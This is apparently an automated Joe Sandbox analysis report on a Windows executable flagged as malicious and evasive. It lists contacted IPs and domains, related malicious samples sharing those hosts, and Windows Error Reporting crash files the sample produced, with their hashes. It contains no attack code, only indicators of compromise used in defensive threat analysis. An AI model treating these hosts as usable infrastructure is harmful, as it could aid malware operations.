No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
107.161.23.150	gumtifire.com	United States		3842	RAMNODEUS	false
5.101.153.227	blackhk1.beget.tech	Russian Federation		198610	BEGET-ASRU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	631872
Start date and time: 22/05/202218:13:07	2022-05-22 18:13:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	xw0K5Lahxz (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.evad.winEXE@6/17@7/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 66.2% (good quality ratio 56.6%) Quality average: 51% Quality standard deviation: 34.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 26
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
5.101.153.227	01CS8hzpQn.exe	Get hash	malicious	Browse
	01CS8hzpQn.exe	Get hash	malicious	Browse
	kaQS2LWm9t.exe	Get hash	malicious	Browse
	T4IoJqcAwY.exe	Get hash	malicious	Browse
	Resetter.exe	Get hash	malicious	Browse
	D81D5F7E16E9F2E0ECCC0C65C3D71781D73B6640F9E6C.exe	Get hash	malicious	Browse
	tHvjY1G08Y.exe	Get hash	malicious	Browse
	5qwvf3Yn37.exe	Get hash	malicious	Browse
	OneClickMaintenance.exe	Get hash	malicious	Browse
	A5453A830D01639AD537320C94E68565341328C872A8F.exe	Get hash	malicious	Browse
	uzu6AvUlng.exe	Get hash	malicious	Browse
	eITxWgldKM.exe	Get hash	malicious	Browse
	5f1hPXQgBa.exe	Get hash	malicious	Browse
	HyR4RKAnZ0.exe	Get hash	malicious	Browse
	JjjaEHzYKf.exe	Get hash	malicious	Browse
	1e8F3AAAuV.exe	Get hash	malicious	Browse
	S9nl4HMtSU.exe	Get hash	malicious	Browse
	C4kSLQPH2B.exe	Get hash	malicious	Browse
	3HJ7vwnq1k.exe	Get hash	malicious	Browse
	J1iP4zusHy.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
blackhk1.beget.tech	01CS8hzpQn.exe	Get hash	malicious	Browse	5.101.153.227
	01CS8hzpQn.exe	Get hash	malicious	Browse	5.101.153.227
	T4IoJqcAwY.exe	Get hash	malicious	Browse	5.101.153.227
	D81D5F7E16E9F2E0ECCC0C65C3D71781D73B6640F9E6C.exe	Get hash	malicious	Browse	5.101.153.227
	tHvjY1G08Y.exe	Get hash	malicious	Browse	5.101.153.227
	OneClickMaintenance.exe	Get hash	malicious	Browse	5.101.153.227
	5f1hPXQgBa.exe	Get hash	malicious	Browse	5.101.153.227
	HyR4RKAnZ0.exe	Get hash	malicious	Browse	5.101.153.227
	JjjaEHzYKf.exe	Get hash	malicious	Browse	5.101.153.227
	1e8F3AAAuV.exe	Get hash	malicious	Browse	5.101.153.227
	S9nl4HMtSU.exe	Get hash	malicious	Browse	5.101.153.227
	C4kSLQPH2B.exe	Get hash	malicious	Browse	5.101.153.227
	J1iP4zusHy.exe	Get hash	malicious	Browse	5.101.153.227
	V0T6A5FI9C.exe	Get hash	malicious	Browse	5.101.153.227
	MsT9tWNbzo.exe	Get hash	malicious	Browse	5.101.153.227
	xs5S2KzvK8.exe	Get hash	malicious	Browse	5.101.153.227
	CLExSz9TxL.exe	Get hash	malicious	Browse	5.101.153.227
	TrdngAnlzr98262.exe	Get hash	malicious	Browse	5.101.153.227
	TrdngAnlzr9562.exe	Get hash	malicious	Browse	5.101.153.227
	TrdngAnlzr2249.exe	Get hash	malicious	Browse	5.101.153.227

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
BEGET-ASRU	01CS8hzpQn.exe	Get hash	malicious	Browse	5.101.153.227
	01CS8hzpQn.exe	Get hash	malicious	Browse	5.101.153.227
	xgWmIBfiA3.exe	Get hash	malicious	Browse	91.106.207.43
	kaQS2LWm9t.exe	Get hash	malicious	Browse	5.101.153.227
	T4IoJqcAwY.exe	Get hash	malicious	Browse	5.101.153.227
	Installer.exe	Get hash	malicious	Browse	5.101.153.251
	invoicecopy.exe	Get hash	malicious	Browse	45.130.41.26
	https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12	Get hash	malicious	Browse	87.236.16.49
	L6YEgoGMzh.exe	Get hash	malicious	Browse	45.130.41.31
	5Qjx5p77v8.lnk	Get hash	malicious	Browse	45.130.41.25
	ql8RxB2fzA.lnk	Get hash	malicious	Browse	45.130.41.25
	z3hir.arm	Get hash	malicious	Browse	5.101.156.23
	Resetter.exe	Get hash	malicious	Browse	5.101.153.227
	setup.exe	Get hash	malicious	Browse	5.101.153.251
	WXmsyqH0Cp.exe	Get hash	malicious	Browse	45.130.41.26
	A177DE2527C8FD59A34636C57C4E2C7FAE771A03333F2.exe	Get hash	malicious	Browse	62.113.103.3
	arm7	Get hash	malicious	Browse	95.214.60.98
	dr053I4HK8.exe	Get hash	malicious	Browse	87.236.16.14
	D81D5F7E16E9F2E0ECCC0C65C3D71781D73B6640F9E6C.exe	Get hash	malicious	Browse	5.101.153.227
	635LsqiCGd	Get hash	malicious	Browse	95.214.61.117
RAMNODEUS	pandora.arm7	Get hash	malicious	Browse	168.235.65.104
	myp0912.exe	Get hash	malicious	Browse	168.235.117.127
	6hauio6NIp.exe	Get hash	malicious	Browse	107.191.100.214
	jet21Wo2De.exe	Get hash	malicious	Browse	107.191.100.214
	CWyt0bvqjt.exe	Get hash	malicious	Browse	107.191.100.214
	UIINQ67NHs.exe	Get hash	malicious	Browse	107.191.100.214
	orxds.exe.21.exe	Get hash	malicious	Browse	107.191.100.214
	1.exe	Get hash	malicious	Browse	107.191.100.214
	RNoQrxkEKl.exe	Get hash	malicious	Browse	107.191.100.214
	boat.arm7	Get hash	malicious	Browse	168.235.88.46
	Jgtq6Kg1Gi	Get hash	malicious	Browse	168.235.88.27
	g89uarj.exe	Get hash	malicious	Browse	107.161.30.122
	g89uarj.exe	Get hash	malicious	Browse	107.161.30.122
	kopa42.exe	Get hash	malicious	Browse	168.235.67.138
	6pcr2S6CQA	Get hash	malicious	Browse	168.235.65.101
	43645947.exe	Get hash	malicious	Browse	168.235.81.235
	sample.exe	Get hash	malicious	Browse	107.161.30.122
	task1.exe	Get hash	malicious	Browse	168.235.67.138
	task1.exe	Get hash	malicious	Browse	168.235.67.138
	Electronic form.xlsm	Get hash	malicious	Browse	107.191.96.60

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_023f2379\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.824261159181923
Encrypted:	false
SSDEEP:	96:4V1eTh+oA7JfOpXIQcQnc6rCcEhcw3rT+HbHg/wW6HeaVOycJalPMLUEq2Hl5rXp:waH56rIjMC/u7sHS274ItUF1
MD5:	6ED10C301E1FA840E3224C20A1DB79F0
SHA1:	6BFE091F3D05BB17BDDC3DECD922072D92152AFE
SHA-256:	3BC21892E52C3BF3447598B857F911DAB89C86134C9DBBF5933859F214D3CC87
SHA-512:	208A6F27CB7DE48ED66A601FC4E58B0EABC2BADDB708C1C3F4E975C9E480020D45A0794185CF655B7E40CBFB21A6E5D1A6530CDEC592A9D7E24AE7B9FF5BB548
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.7.4.2.0.6.4.9.7.8.4.6.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.8.6.1.c.d.7.-.7.a.4.1.-.4.9.5.5.-.b.3.d.5.-.c.8.8.2.0.0.6.e.9.6.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.a.6.f.e.1.a.-.d.e.2.6.-.4.e.7.1.-.8.8.1.0.-.f.a.c.6.5.c.2.5.7.a.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.w.0.K.5.L.a.h.x.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.8.-.0.0.0.1.-.0.0.1.d.-.9.c.4.9.-.f.4.6.5.4.2.6.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.9.c.3.b.c.7.6.0.7.c.d.0.2.6.b.f.f.5.6.4.5.f.7.2.2.4.a.6.0.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.b.6.7.a.7.7.f.f.f.1.6.b.5.d.1.d.b.7.3.4.f.5.5.4.8.0.6.a.7.4.9.a.c.9.2.9.c.8.a.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.3././.0.3.:.1.3.:.2.6.:.4.4.!.0.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_17aefe1e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8108728048821041
Encrypted:	false
SSDEEP:	96:20n1FTh+oA7JfOpXIQcQnc6rCcEhcw3rT+HbHg/wW6HeaVOycJalPMLUEq2Hl5rU:2WRH56rIjMG/u7ssS274ItUF1
MD5:	8D7DEBF8596F5528628E54E9AFBD8D90
SHA1:	55ABAFF9EE7F01FBFB210186A957E73731F015D8
SHA-256:	E54819C9B2348D308F2F2CC31E66BC0DFF17D19FCDD0122BF8ACFACBFE286577
SHA-512:	751DEFD4A517250460842DDDEECD6D5746914D76A7E76D251816F2407291900F665983B601414680EDE95FE3F3F3BDA2DFAC187581FCC4BB72A9FE5E8E203230
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.7.4.2.0.5.5.3.7.6.9.1.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.f.6.f.b.1.2.-.e.9.b.8.-.4.f.0.6.-.8.6.0.1.-.6.c.0.6.9.2.c.d.6.f.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.7.3.6.4.a.2.-.0.b.a.a.-.4.7.8.0.-.9.0.7.8.-.4.d.8.9.7.2.7.d.7.b.e.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.w.0.K.5.L.a.h.x.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.8.-.0.0.0.1.-.0.0.1.d.-.9.c.4.9.-.f.4.6.5.4.2.6.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.9.c.3.b.c.7.6.0.7.c.d.0.2.6.b.f.f.5.6.4.5.f.7.2.2.4.a.6.0.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.b.6.7.a.7.7.f.f.f.1.6.b.5.d.1.d.b.7.3.4.f.5.5.4.8.0.6.a.7.4.9.a.c.9.2.9.c.8.a.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.3././.0.3.:.1.3.:.2.6.:.4.4.!.0.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_19430a82\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8107392709804474
Encrypted:	false
SSDEEP:	96:ZuU21FTh+oA7JfOpXIQcQnc6rCcEhcw3rT+HbHg/wW6HeaVOycJalPMLUEq2Hl5A:lqRH56rIjMG/u7ssS274ItUF1
MD5:	AF4EB4CA4C7DFED312B7D5D9F79C6204
SHA1:	8AA0A12D16A714A17755BA5C380E80F1F542BAD9
SHA-256:	F88F8A091282449996DD6FB4992113BCE66D79A00B0BA6328768428DE3643B12
SHA-512:	51D114CEA3DFD9317ADE347EA0C12D10CE53A7AEFF11AADE063FA67837882C6115DE407780DAB97880A8409D904A775CE5E6233AD25F65A4A51411B584D096B3
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.7.4.2.0.5.8.5.3.7.5.4.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.0.3.2.2.9.d.-.f.e.8.f.-.4.4.e.f.-.a.1.9.2.-.d.8.5.3.c.f.7.0.8.e.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.2.d.c.1.5.f.-.c.8.7.1.-.4.c.3.0.-.8.8.3.1.-.8.4.c.a.7.e.4.1.4.3.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.w.0.K.5.L.a.h.x.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.8.-.0.0.0.1.-.0.0.1.d.-.9.c.4.9.-.f.4.6.5.4.2.6.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.9.c.3.b.c.7.6.0.7.c.d.0.2.6.b.f.f.5.6.4.5.f.7.2.2.4.a.6.0.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.b.6.7.a.7.7.f.f.f.1.6.b.5.d.1.d.b.7.3.4.f.5.5.4.8.0.6.a.7.4.9.a.c.9.2.9.c.8.a.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.3././.0.3.:.1.3.:.2.6.:.4.4.!.0.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_xw0K5Lahxz.exe_95aa1ac7bda4b245fee33b1ebd16a7c0b6cf9a_9d1d8c5d_1bbef16c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.810621438055456
Encrypted:	false
SSDEEP:	96:wjjn1eTh+oA7JfOpXIQcQnc6rCcEhcw3rT+HbHg/wW6HeaVOycJalPMLUEq2Hl5A:U5aH56rIjMG/u7ssS274ItUF1
MD5:	F18A5A1CE1BA375CC095B06576AC6748
SHA1:	9D900EC5AF23602E1000CA1C8DC62B6D3E635C18
SHA-256:	862FA58F009C593A2D9E08607B2ECCCEAFBA1594987FD192BBBBACCC6264B758
SHA-512:	65DE26DA91DBB677CDFED0AE6DAC07C725E9593D46E24F1401A7A95F2E2E03569817F7ACFAC966506F9FBF65914680125CA4550902F31A118B0FADD224CE5BA9
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.7.4.2.0.5.1.9.7.0.7.0.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.a.1.b.6.1.5.-.5.b.8.a.-.4.b.0.7.-.9.f.f.3.-.5.8.c.1.3.c.1.a.c.e.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.d.4.7.2.2.4.-.f.c.1.3.-.4.c.9.2.-.b.b.e.5.-.d.2.6.6.7.1.a.b.a.6.4.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.x.w.0.K.5.L.a.h.x.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.8.-.0.0.0.1.-.0.0.1.d.-.9.c.4.9.-.f.4.6.5.4.2.6.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.9.c.3.b.c.7.6.0.7.c.d.0.2.6.b.f.f.5.6.4.5.f.7.2.2.4.a.6.0.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.c.b.6.7.a.7.7.f.f.f.1.6.b.5.d.1.d.b.7.3.4.f.5.5.4.8.0.6.a.7.4.9.a.c.9.2.9.c.8.a.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.3././.0.3.:.1.3.:.2.6.:.4.4.!.0.!.x.w.0.K.5.L.a.h.x.z...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EF5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 23 01:14:25 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	79960
Entropy (8bit):	2.0936013247726857
Encrypted:	false
SSDEEP:	384:dn8bv9E4qEe9rMJhsALjMbZKr80IJQHRcN/RYrvqt1:dqE4qHNOKSLRc5
MD5:	B03DB6CBB4023C14995B45D12D57E65F
SHA1:	EA63E471613612C2E830B5925C08B2D372BAE189
SHA-256:	D9EFD51895C7F68F4524E7827546DE40D031CCFAD9DF5B61C4C6557D9182B3B3
SHA-512:	BFB7F6A5FBB0F1042AE73161FDFB68D56792FCD4D78115DC681220F5877D4AF8AD2B7762D4F77FA4E720EAD5399BA2217F81D381DD132E31149F67D0E1C3C6CB
Malicious:	false
Reputation:	low
Preview:	MDMP....... .........b............T...............\............2..........T.......8...........T...............@"..........L...........8....................................................................U...........B..............GenuineIntelW...........T.......x.....b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER21B5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8340
Entropy (8bit):	3.708036516775516
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiJE6DXS6YWySUlRLgmfTSxZiCpBD89b3msfIdm:RrlsNiK6DXS6YDSUl9gmfTSxS3Ffv
MD5:	4997BEDFD2352CE24053C7013CE7A935
SHA1:	79CDFB02D0D5DFE19F9A1A18C9772DE997E033D8
SHA-256:	9E584AD627D6634B6359B03DB5A42F055A7A93DB6AB5B0E0B154C2A2AAC0BC64
SHA-512:	3A5807C25D0FB489091A406565B5E51DB3F98659C3C5BF6C0055F0CE82FCF870CEEB3A3C36A9289E015B62E82DA34C48398C67D03C277F211CAF68AC67DD3FD6
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22B0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.501884617803067
Encrypted:	false
SSDEEP:	48:cvIwSD8zsMJgtWI9BdWgc8sqYjK8fm8M4Jd/9PZFl+q8G1B9p8gd:uITfKesgrsqY7JZ1p3r9p8gd
MD5:	C9DACB482CE67FF8D6175ED4FCE03786
SHA1:	BB09C5F1BD9340D208FE22E57D8219626F7BD553
SHA-256:	8E907314F0CF56579DFDD8C81DAA334130D48BCD21D562FA77501B56F56347C1
SHA-512:	3808BF7CE514E7D2734FEA0DEF81BAA9D399EB991D4595706EA7E556C9E2C590B06549E8F2025A62C9BCF446972394740EC0632322581F7369A383EF7659A26C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1527025" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon May 23 01:14:18 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	76028
Entropy (8bit):	2.2166390492089802
Encrypted:	false
SSDEEP:	384:TISEcF2wTg0ea5ejbk6RHHcN/tyRKe+xOqNT:TPE5eePk6FHcDyYe+5N
MD5:	17791E4FAF79F65D880BC1BE395B750D
SHA1:	54377AFF9AC0E449A93D613DD04F2A59B66F1693
SHA-256:	79E2EE50207F406DC227A911F27C718D6BD3E52736723A6D756238158B6EAC9E
SHA-512:	0D1994D703BCFD6F4E51AB2A83ABEDBE1A3A7606DA11D265D3E7E31C0D09D722B4120F1154AC08DD7A586189135B037A87AB1E56FA629568EC6010AC5CBC5FE5
Malicious:	false
Reputation:	low
Preview:	MDMP....... .........b............$...............,.......................T.......8...........T...........8...............D...........0....................................................................U...........B..............GenuineIntelW...........T.......x.....b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.7082514689690096
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiJC6QrH6YW3SUlRXgmfTSxZiCpBu89bImsfLYm:RrlsNic6QL6YmSUlhgmfTSxBIFfh
MD5:	8E96A2FCFF43C41022CB35DB880DC951
SHA1:	FF47B2E2D7DE558F8F9E49F97C92BFACD4D405C9
SHA-256:	D846CE3FE355743E32A727E995478EA5BFBD53EBD19ECEF00D2D8FF9F698A2CD
SHA-512:	A2FE893CBF83E8F9A7CC09F2B7EB2528C4F93EA243996044E6684ECE00194CEAEAC496AFBB8493539F5A1AF904735ABBD538FD72869E87EF5A4CA78BB9A1099D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER98A.tmp.xml

Download File

